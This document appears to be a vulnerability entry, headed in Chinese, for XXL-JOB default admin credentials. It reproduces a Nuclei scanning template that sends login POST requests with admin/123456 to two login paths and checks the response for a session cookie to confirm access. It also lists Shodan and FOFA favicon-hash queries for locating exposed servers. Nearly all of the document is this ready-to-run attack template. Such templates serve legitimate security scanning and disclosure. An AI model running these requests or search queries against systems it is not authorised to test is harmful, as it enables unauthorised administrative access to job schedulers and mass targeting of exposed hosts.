漏洞描述
XXL-JOB default admin credentials were discovered.
shodan: http.favicon.hash:1691956220
fofa: icon_hash="1691956220"
xxljob-default-login: XXL-JOB Default Login
PoC代码[已公开]
id: xxljob-default-login
info:
name: XXL-JOB Default Login
author: pdteam,ritikchaddha
severity: high
description: XXL-JOB default admin credentials were discovered.
reference:
- https://github.com/xuxueli/xxl-job
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
metadata:
verified: true
max-request: 2
shodan-query: http.favicon.hash:1691956220
product: xxl-job
vendor: xuxueli
fofa-query: icon_hash=1691956220
tags: default-login,xxljob,vuln
http:
- raw:
- |
POST /xxl-job-admin/login HTTP/1.1
Host:{{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
userName={{username}}&password={{password}}
- |
POST /login HTTP/1.1
Host:{{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
userName={{username}}&password={{password}}
attack: pitchfork
payloads:
username:
- admin
password:
- 123456
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
words:
- '"code":200'
- '"msg"'
- '"content"'
condition: and
- type: word
part: header
words:
- 'application/json'
- 'XXL_JOB_LOGIN_IDENTITY'
condition: and
- type: status
status:
- 200
# digest: 4a0a0047304502205890771846cad066977a909d1a02fc2f11cc427c2a4e8a706a34989911e8b94b0221008e510550e92c9da4c49095ff6e651558432f0dbc6231e969df4920cb7c113b0f:922c64590222798bb761d5b6d8e72950